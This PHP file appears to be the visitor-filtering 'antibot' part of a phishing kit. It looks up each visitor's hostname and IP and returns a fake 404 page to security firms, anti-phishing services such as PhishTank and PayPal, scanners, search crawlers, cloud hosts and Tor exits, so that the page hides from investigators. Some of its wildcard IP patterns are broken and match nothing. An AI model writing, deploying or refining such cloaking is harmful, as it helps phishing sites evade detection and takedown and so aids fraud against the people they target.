<?php
/*
| |    / /         /\          | |      \ \         / /
| |   / /         /  \         | |       \ \       / /
| |  / /         / /\ \        | |        \ \     / /
| | / /         / /  \ \       | |         \ \   / /
| |/ /         / /____\ \      | |          \ \ / /
| |\ \        / /______\ \     | |            | |
| | \ \      / /        \ \    | |            | |
| |  \ \    / /          \ \   | |________    | |
|_|   \_\  /_/            \_\  |__________|   |_|
*/
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array(
           "above",
           /*"localhost",*/
           "google",
           "softlayer",
           "amazonaws",
           "cyveillance",
           "phishtank",
           "dreamhost",
           "netpilot",
           "calyxinstitute",
           "tor-exit",
           "paypal",
           "bot",
           "above",
           "google",
           "softlayer",
           "amazonaws",
           "cyveillance",
           "compatible",
           "facebook",
           "phishtank",
           "dreamhost",
           "netpilot",
           "calyxinstitute",
           "tor-exit",
           "apache-httpclient",
           "lssrocketcrawler",
           "Trident",
           "X11",
           "Macintosh",
           "crawler",
           "urlredirectresolver",
           "jetbrains",
           "spam",
           "windows 95",
           "windows 98",
           "acunetix",
           "netsparker",
           "google",
           "007ac9",
           "008",
           "192.comagent",
           "200pleasebot",
           "360spider",
           "4seohuntbot",
           "50.nu",
           "a6-indexer",
           "admantx",
           "amznkassocbot",
           "aboundexbot",
           "aboutusbot",
           "abrave spider",
           "accelobot",
           "acoonbot",
           "addthis.com",
           "adsbot-google",
           "ahrefsbot",
           "alexabot",
           "amagit.com",
           "analytics",
           "antbot",
           "apercite",
           "aportworm",
           "arabot",
           "crawl",
           "slurp",
           "spider",
           "seek",
           "accoona",
           "acoon",
           "adressendeutschland",
           "ah-ha.com",
           "ahoy",
           "altavista",
           "ananzi",
           "anthill",
           "appie",
           "arachnophilia",
           "arale",
           "araneo",
           "aranha",
           "architext",
           "aretha",
           "arks",
           "asterias",
           "atlocal",
           "atn",
           "atomz",
           "augurfind",
           "backrub",
           "bannana_bot",
           "baypup",
           "bdfetch",
           "big brother",
           "biglotron",
           "bjaaland",
           "blackwidow",
           "blaiz",
           "blog",
           "blo.",
           "bloodhound",
           "boitho",
           "booch",
           "bradley",
           "butterfly",
           "calif",
           "cassandra",
           "ccubee",
           "cfetch",
           "charlotte",
           "churl",
           "cienciaficcion",
           "cmc",
           "collective",
           "comagent",
           "combine",
           "computingsite",
           "csci",
           "curl",
           "cusco",
           "daumoa",
           "deepindex",
           "delorie",
           "depspid",
           "deweb",
           "die blinde kuh",
           "digger",
           "ditto",
           "dmoz",
           "docomo",
           "download express",
           "dtaagent",
           "dwcp",
           "ebiness",
           "ebingbong",
           "e-collector",
           "ejupiter",
           "emacs-w3 search engine",
           "esther",
           "evliya celebi",
           "ezresult",
           "falcon",
           "felix ide",
           "ferret",
           "fetchrover",
           "fido",
           "findlinks",
           "fireball",
           "fish search",
           "fouineur",
           "funnelweb",
           "gazz",
           "gcreep",
           "genieknows",
           "getterroboplus",
           "geturl",
           "glx",
           "goforit",
           "golem",
           "grabber",
           "grapnel",
           "gralon",
           "griffon",
           "gromit",
           "grub",
           "gulliver",
           "hamahakki",
           "harvest",
           "havindex",
           "helix",
           "heritrix",
           "hku www octopus",
           "homerweb",
           "htdig",
           "html index",
           "html_analyzer",
           "htmlgobble",
           "hubater",
           "hyper-decontextualizer",
           "ia_archiver",
           "ibm_planetwide",
           "ichiro",
           "iconsurf",
           "iltrovatore",
           "image.kapsi.net",
           "imagelock",
           "incywincy",
           "indexer",
           "infobee",
           "informant",
           "ingrid",
           "inktomisearch.com",
           "inspector web",
           "intelliagent",
           "internet shinchakubin",
           "ip3000",
           "iron33",
           "israeli-search",
           "ivia",
           "jack",
           "jakarta",
           "javabee",
           "jetbot",
           "jumpstation",
           "katipo",
           "kdd-explorer",
           "kilroy",
           "knowledge",
           "kototoi",
           "kretrieve",
           "labelgrabber",
           "lachesis",
           "larbin",
           "legs",
           "libwww",
           "linkalarm",
           "link validator",
           "linkscan",
           "lockon",
           "lwp",
           "lycos",
           "magpie",
           "mantraagent",
           "mapoftheinternet",
           "marvin/",
           "mattie",
           "mediafox",
           "mediapartners",
           "mercator",
           "merzscope",
           "microsoft url control",
           "minirank",
           "miva",
           "mj12",
           "mnogosearch",
           "moget",
           "monster",
           "moose",
           "motor",
           "multitext",
           "muncher",
           "muscatferret",
           "mwd.search",
           "myweb",
           "najdi",
           "nameprotect",
           "nationaldirectory",
           "nazilla",
           "ncsa beta",
           "nec-meshexplorer",
           "nederland.zoek",
           "netcarta webmap engine",
           "netmechanic",
           "netresearchserver",
           "netscoop",
           "newscan-online",
           "nhse",
           "nokia6682/",
           "nomad",
           "noyona",
           "nutch",
           "nzexplorer",
           "objectssearch",
           "occam",
           "omni",
           "open text",
           "openfind",
           "openintelligencedata",
           "orb search",
           "osis-project",
           "pack rat",
           "pageboy",
           "pagebull",
           "page_verifier",
           "panscient",
           "parasite",
           "partnersite",
           "patric",
           "pear.",
           "pegasus",
           "peregrinator",
           "pgp key agent",
           "phantom",
           "phpdig",
           "picosearch",
           "piltdownman",
           "pimptrain",
           "pinpoint",
           "pioneer",
           "piranha",
           "plumtreewebaccessor",
           "pogodak",
           "poirot",
           "pompos",
           "poppelsdorf",
           "poppi",
           "popular iconoclast",
           "psycheclone",
           "publisher",
           "python",
           "rambler",
           "raven search",
           "roach",
           "road runner",
           "roadhouse",
           "robbie",
           "robofox",
           "robozilla",
           "rules",
           "salty",
           "sbider",
           "scooter",
           "scoutjet",
           "scrubby",
           "search.",
           "searchprocess",
           "semanticdiscovery",
           "senrigan",
           "sg-scout",
           "shai'hulud",
           "shark",
           "shopwiki",
           "sidewinder",
           "sift",
           "silk",
           "simmany",
           "site searcher",
           "site valet",
           "sitetech-rover",
           "skymob.com",
           "sleek",
           "smartwit",
           "sna-",
           "snappy",
           "snooper",
           "sohu",
           "speedfind",
           "sphere",
           "sphider",
           "spinner",
           "spyder",
           "steeler/",
           "suke",
           "suntek",
           "supersnooper",
           "surfnomore",
           "sven",
           "sygol",
           "szukacz",
           "tach black widow",
           "tarantula",
           "templeton",
           "/teoma",
           "t-h-u-n-d-e-r-s-t-o-n-e",
           "theophrastus",
           "titan",
           "titin",
           "tkwww",
           "toutatis",
           "t-rex",
           "tutorgig",
           "twiceler",
           "twisted",
           "ucsd",
           "udmsearch",
           "url check",
           "updated",
           "vagabondo",
           "valkyrie",
           "verticrawl",
           "victoria",
           "vision-search",
           "volcano",
           "voyager/",
           "voyager-hc",
           "w3c_validator",
           "w3m2",
           "w3mir",
           "walker",
           "wallpaper",
           "wanderer",
           "wauuu",
           "wavefire",
           "web core",
           "web hopper",
           "web wombat",
           "webbandit",
           "webcatcher",
           "webcopy",
           "webfoot",
           "weblayers",
           "weblinker",
           "weblog monitor",
           "webmirror",
           "webmonkey",
           "webquest",
           "webreaper",
           "websitepulse",
           "websnarf",
           "webstolperer",
           "webvac",
           "webwalk",
           "webwatch",
           "webwombat",
           "webzinger",
           "wget",
           "whizbang",
           "whowhere",
           "wild ferret",
           "worldlight",
           "wwwc",
           "wwwster",
           "xenu",
           "xift",
           "xirq",
           "yandex",
           "yanga",
           "yeti",
           "yahoo!"
     );
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
    header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");

    }
}

$IP_Connected = $_SERVER['REMOTE_ADDR'];
 $IP_Banned = array(
          "149.20.57.227",
          "199.48.147.36",
          "37.59.162.218",
          "89.122.57.201",
          "69.163.205.29",
          "74.120.15.150",
          "109.163.233.200",
          "79.120.86.20",
          "31.172.30.4",
          "109.65.136.19",
          "66.150.14.185",
          "50.97.98.130",
          "66.150.14.185",
          "80.237.226.73",
          "64.34.184.153",
          "66.230.230.230",
          "71.165.245.158",
          "74.120.15.150",
          "76.73.56.7",
          "77.109.139.87",
          "81.218.219.122",
          "83.86.110.188",
          "83.142.228.14",
          "83.249.87.238",
          "85.17.92.13",
          "85.235.31.248",
          "87.118.104.203",
          "88.80.28.70",
          "88.208.121.151",
          "89.253.97.235",
          "91.121.170.32",
          "94.249.153.47",
          "95.143.193.145",
          "109.169.29.56",
          "109.123.119.163",
          "137.56.163.46",
          "137.56.163.64",
          "173.193.221.28",
          "192.251.226.205",
          "192.251.226.206",
          "199.48.147.35",
          "199.48.147.36",
          "199.48.147.38",
          "199.48.147.40",
          "199.48.147.41",
          "208.66.135.190",
          "209.44.114.178",
          "209.159.142.164",
          "209.159.143.130",
          "213.220.233.230",
          "8.18.38.105 ",
          "62.141.58.13",
          "62.163.180.154",
          "77.171.107.207",
          "78.47.251.152 " ,
          "81.169.155.246",
          "82.194.86.135",
          "83.163.192.49",
          "91.121.152.114",
          "91.213.50.235",
          "94.23.215.184",
          "174.138.169.218",
          "64.34.162.160",
          "66.249.9.107" ,
          "66.96.16.32",
          "78.107.233.68",
          "78.107.237.16",
          "83.170.92.9",
          "85.214.73.63",
          "91.124.187.225",
          "194.0.229.54",
          "195.43.157.85",
          "212.78.238.92",
          "217.114.211.20" ,
          "62.24.222.132",
          "62.24.222.131",
          "66.235.133.14/22",
           "^66.102.*.*",
           "^38.100.*.*",
           "^107.170.*.*",
           "^149.20.*.*",
           "^38.105.*.*",
           "^74.125.*.*",
           "^66.150.14.*",
           "^54.176.*.*",
           "^38.100.*.*",
           "^184.173.*.*",
           "^66.249.*.*",
           "^128.242.*.*",
           "^72.14.192.*",
           "^208.65.144.*",
           "^74.125.*.*",
           "^209.85.128.*",
           "^216.239.32.*",
           "^74.125.*.*",
           "^207.126.144.*",
           "^173.194.*.*",
           "^64.233.160.*",
           "^72.14.192.*",
           "^66.102.*.*",
           "^64.18.*.*",
           "^194.52.68.*",
           "^194.72.238.*",
           "^62.116.207.*",
           "^212.50.193.*",
           "^69.65.*.*",
           "^50.7.*.*",
           "^131.212.*.*",
           "^46.116.*.*",
           "^62.90.*.*",
           "^89.138.*.*",
           "^82.166.*.*",
           "^85.64.*.*",
           "^85.250.*.*",
           "^89.138.*.*",
           "^93.172.*.*",
           "^109.186.*.*",
           "^194.90.*.*",
           "^212.29.192.*",
           "^212.29.224.*",
           "^212.143.*.*",
           "^212.150.*.*",
           "^212.235.*.*",
           "^217.132.*.*",
           "^50.97.*.*",
           "^217.132.*.*",
           "^209.85.*.*",
           "^66.205.64.*",
           "^204.14.48.*",
           "^64.27.2.*",
           "^67.15.*.*",
           "^202.108.252.*",
           "^193.47.80.*",
           "^64.62.136.*",
           "^66.221.*.*",
           "^64.62.175.*",
           "^198.54.*.*",
           "^192.115.134.*",
           "^216.252.167.*",
           "^193.253.199.*",
           "^69.61.12.*",
           "^64.37.103.*",
           "^38.144.36.*",
           "^64.124.14.*",
           "^206.28.72.*",
           "^209.73.228.*",
           "^158.108.*.*",
           "^168.188.*.*",
           "^66.207.120.*",
           "^167.24.*.*",
           "^192.118.48.*",
           "^67.209.128.*",
           "^12.148.209.*",
           "^12.148.196.*",
           "^193.220.178.*",
           "68.65.53.71",
           "^198.25.*.*",
           "^64.106.213.*",
           "^66.102.*.*",
           "^38.100.*.*",
           "^107.170.*.*",
           "^149.20.*.*",
           "^38.105.*.*",
           "^74.125.*.*",
           "^66.150.14.*",
           "^54.176.*.*",
           "^38.100.*.*",
           "^184.173.*.*",
           "^66.249.*.*",
           "^128.242.*.*",
           "^72.14.192.*",
           "^208.65.144.*",
           "^74.125.*.*",
           "^209.85.128.*",
           "^216.239.32.*",
           "^74.125.*.*",
           "^207.126.144.*",
           "^173.194.*.*",
           "^64.233.160.*",
           "^72.14.192.*",
           "^66.102.*.*",
           "^64.18.*.*",
           "^194.52.68.*",
           "^194.72.238.*",
           "^62.116.207.*",
           "^212.50.193.*",
           "^69.65.*.*",
           "^50.7.*.*",
           "^131.212.*.*",
           "^46.116.*.* ",
           "^62.90.*.*",
           "^89.138.*.*",
           "^82.166.*.*",
           "^85.64.*.*",
           "^85.250.*.*",
           "^89.138.*.*",
           "^93.172.*.*",
           "^109.186.*.*",
           "^194.90.*.*",
           "^212.29.192.*",
           "^212.29.224.*",
           "^212.143.*.*",
           "^212.150.*.*",
           "^212.235.*.*",
           "^217.132.*.*",
           "^50.97.*.*",
           "^217.132.*.*",
           "^209.85.*.*",
           "^66.205.64.*",
           "^204.14.48.*",
           "^64.27.2.*",
           "^67.15.*.*",
           "^202.108.252.*",
           "^193.47.80.*",
           "^64.62.136.*",
           "^66.221.*.*",
           "^64.62.175.*",
           "^198.54.*.*",
           "^192.115.134.*",
           "^216.252.167.*",
           "^193.253.199.*",
           "^69.61.12.*",
           "^64.37.103.*",
           "^38.144.36.*",
           "^64.124.14.*",
           "^206.28.72.*",
           "^209.73.228.*",
           "^158.108.*.*",
           "^168.188.*.*",
           "^66.207.120.*",
           "^167.24.*.*",
           "^192.118.48.*",
           "^67.209.128.*",
           "^12.148.209.*",
           "^12.148.196.*",
           "^193.220.178.*",
           "68.65.53.71",
           "^198.25.*.*",
           "^64.106.213.*",
           "54.228.218.117",
           "^54.228.218.*",
           "185.28.20.243",
           "^185.28.20.*",
           "217.16.26.166",
           "^217.16.26.*"
 );
if(in_array($IP_Connected,$IP_Banned)){
    $errors = '<h1>404 Not Found</h1>The page that you have requested could not be found.<br>';
   // $errors .= gethostbyaddr($_SERVER['REMOTE_ADDR']).'<br>';
  // $errors .= php_uname();
    die($errors);
}
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("drweb","Dr.Web","hostinger","scanurl","above","google","facebook","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");

    }
}
